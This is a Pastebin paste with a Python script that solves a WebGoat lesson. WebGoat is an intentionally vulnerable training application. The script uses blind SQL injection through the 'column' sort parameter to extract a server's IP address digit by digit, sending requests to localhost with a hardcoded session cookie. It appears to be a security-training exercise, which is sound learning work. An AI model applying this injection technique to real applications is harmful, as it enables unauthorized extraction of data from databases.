Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import requests
- import json
- import string
- import time
- headers = {
- "User-Agent": "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0",
- "Accept": "*/*",
- "Accept-Language": "en-GB,en;q=0.5",
- "Referer": "http://localhost:8080/WebGoat/start.mvc",
- "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
- "X-Requested-With": "XMLHttpRequest",
- "Content-Length": "0",
- "Connection": "keep-alive",
- "Cookie": "JSESSIONID=78BBF34E5F19E8FAE372FAF8C309D279",
- "Host": "localhost:8080"
- }
- ip = ""
- for i in range(1,5):
- for digit in string.digits:
- url = f"http://localhost:8080/WebGoat/SqlInjection/servers?column=(case when (select ip from servers where hostname='webgoat-prd' and substr(ip,{i},1) = '{digit}') IS NOT NULL then hostname else id end)"
- r = requests.get(url, headers=headers)
- if r.json()[0]['id'] != '1':
- ip += digit
- break
- print(ip)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement